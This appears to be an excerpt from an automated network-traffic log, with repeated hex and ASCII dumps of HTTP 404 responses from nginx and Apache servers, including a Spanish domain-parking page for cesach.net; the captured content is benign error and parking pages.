                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:38 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:40 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 61 37 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 4d 0a c2 30 10 85 f7 82 77 18 0f 10 a2 d0 e5 90 8d 28 b8 d0 8d 27 48 9d 31 09 a4 93 12 23 d8 db 9b 6a 0b e2 da a5 ab 61 de cf c7 43 5f ba 68 96 0b f4 6c c9 60 09 25 b2 69 d6 0d 9c 52 81 7d ba 0b a1 7e 8b a8 5f 91 1a 6d 13 0d e3 bd b0 14 ce 06 fd e6 bb 51 15 d4 93 3d b2 6b 68 fa c4 05 79 7c 7a 7a a6 e9 79 c9 4a 29 b0 d0 5b a2 20 0e 4a 02 0a 37 db 46 86 e3 f9 b0 03 2b 04 5b 9f 53 c7 70 cd 81 85 e2 00 9c 73 ca b5 e1 18 94 fa 23 7e 8d 78 02 27 a7 bf a8 24 02 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: a7M0w('H1#jaC_hl`%iR}~_mQ=khy|zzyJ)[ J7F+[Sps#~x'$0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:41:43 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingData Raw: 32 32 34 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 224<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:42:03 GMTServer: ApacheX-ServerIndex: llim604Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:42:05 GMTServer: ApacheX-ServerIndex: llim605Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:42:08 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 06 Nov 2024 07:42:10 GMTServer: ApacheX-ServerIndex: llim603Upgrade: h2,h2cConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 31 61 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 63 65 73 61 63 68 2e 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 45 78 6f 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 74 68 65 57 69 64 74 68 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 66 28 73 63 72 65 65 6e 2e 77 69 64 74 68 20 3c 3d 20 34 32 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6d 76 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 68 65 57 69 64 74 68 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 76 70 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 63 6f 6e 74 65 6e 74 27 2c 27 77 69 64 74 68 3d 34 30 30 27 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 21 2d 2d 20 63 6c 69 65 6e 74 20 2d 2d 3e 0d 0a 3c 68 65 61 64 65 72 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 65 6e 74 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 3b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 23 3b 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:42:17 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea f8 8d 3d 76 a3 d9 9d 49 8f e8 1f 37 9a dd a9 e4 7e 5d 3b 51 9c 98 d2 d4 0b f4 43 26 dd f5 a2 65 6f 54 bd 2e 2a 6c cd 76 81 a2 67 1d 6d 90 93 a9 bb 3a 5a 06 fe e2 4c 6d 8a f2 b8 40 58 6d b7 a5 c6 cd b1 b1 7a 73 85 5e 95 45 75 ff 4e 25 b7 ed fc 0d 48 5e 21 ef 56 af 8d 46 7f bc f5 ae d0 6f e6 ce 58 03 b4 5f 75 b9 d7 b6 48 14 7a af 77 1a 38 2f 6b 08 f3 aa 35 30 f3 20 26 83 6e 55 d5 00 a3 81 0f 6e 74 5d 64 00 7b e9 ac a1 1b e7 15 7a bd 31 7f 17 de 44 ff 37 28 b7 c7 cd 9d 29 bd 13 bd 53 74 17 91 d5 0f 16 37 b9 4a cd 61 81 e8 f6 01 b1 fe a9 d7 77 ea 47 2e e5 15 7a 7c 51 12 ca 9f 26 38 55 16 eb 6a 81 12 58 42 5d b7 f4 af 4f dc 3b 67 7d da db 7c 35 c5 17 bd 40 9c f8 52 6f 26 69 3c e8 62 9d db 05 0a 29 fd 7e c2 4b 6d 41 35 6e b6 2a 29 aa 35 e4 9c 12 ca 07 35 fd aa 41 5a ad d9 2c 90 00 f7 2f 97 73 a4 76 ae 11 57 72 aa a8 74 dd bb d8 16 db 02 31 4a 9f 9d 80 eb ce 3b b5 b3 e6 84 5e ea 6c 4a ee b5 aa aa d8 28 ab 3f 7d ea 07 69 af bd 9b 16 a6 c2 e9 ae 6e 07 60 aa 79 71 c6 cb 8a b2 c4 1b 93 42 9a 20 98 fc 9b 8a 33 95 ea b7 d5 85 5a b7 a3 16 a8 63 4e 71 45 95 99 5e 78 cc ab 8c fd 24 eb 57 00 2c 9e 92 7a 9c ae 6b 53 9f 01 93 98 33 1e 9e 00 27 a4 1e 78 50 75 05 4b 74 06 cd b2 24 11 e2 04 3a 21 f5 d0 66 97 24 ba 69 ce dd 55 77 ca 3f b5 3a 21 0d 61 c2 72 e2 12 56 46 f7 e8 bc af 2a 26 f8 50 0d c3 0a 8f 94 1e 9b ea 26 a9 8b 6d 9b 46 57 ce 67 f6 43 ea ae ef 97 21 3b a9 e6 ae c8 19 e1 63 91 43 3b d0 78 70 87 9f 55 61 66 8c 1d 4b 70 5a ae fe 58 c4 13 b5 b0 ef 7a ad e7 55 91 ea 52 1d 31 6b 2e cb cd 31 c6 5a eb 60 3f df eb 63 56 43 c1 34 e8 a4 9a b2 da 6c fa e1 cc b8 10 2d 20 fb c8 bf 76 bb dd 5c f0 d9 84 ef 5e cb f9 d0 78 97 f3 fe 3c 58 ba 06 dc f6 e4 b4 d8 a3 a4 54 4d b3 f2 c6 fd e7 b5 3d 7a ca aa cd a1 23 9e 01 ca 9e 7a 42 be dc 71 67 5b 65 00 c1 89 b0 5f f7 c3 59 0f 6e 77 c7 a4 76 32 85 3f ef 74 d3 66 2e 29 ea a4 d4 de 80 78 d8 94 15 20 72 6b b7 8b f9 fc 70 38 90 83 20 a6 5e cf 39 a5 74 0e aa 47 49 77 ac bd 32 0f 2b 8f 22 8a 24 e3 ee 19 98 83 2f b3 e5 56 d9 7c 98 cc d2 95 f7 4e 52 1f ba 6b 90 50 a8 d0 80 c4 71 88 19 63 84 fa 02 71 3f c2 f0 b8 ef 6d 84 44 cc 1d 17 45 4e fa 26 42 8c c5 84 46 a2 fb 82 74 4b 47 51 e3 10 ad 86 a8 d5 e0 9e 2f ef 78 c0 49 20 25 8a 69 82 a5 4f
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2024 07:42:19 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzipData Raw: 35 34 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 56 59 8f db 36 10 7e 76 7e 05 a3 22 48 0b 2c 69 1e a2 0e c7 5e 34 d9 26 68 1e 72 a0 db a2 e8 53 c0 95 28 4b 5d 59 74 24 da 5e a7 c8 7f ef 50 d7 ca 76 82 16 ba c8 99 f9 e6 e2 70 a8 e5 d3 5f 3e dc fc fe d7 c7 d7 28 b7 9b f2 fa c9 d2 7d 50 a9 aa f5 ca d3 95 77 fd 64 b6 cc b5 4a e1 3b 5b 6e b4 55 28 c9 55 dd 68 bb f2 76 36 c3 91 87 e6 8f ac 4a 6d f4 ca db 17 fa b0 35 b5 f5 50 62 2a ab 2b 10 3d 14 a9 cd 57 a9 de 17 89 c6 ed e4 0a 15 55 61 0b 55 e2 26 51 a5 5e b1 41 91 2d 6c a9 af 3f aa b5 46 ef 8d 45 6f cc ae 4a 97 f3 8e ea 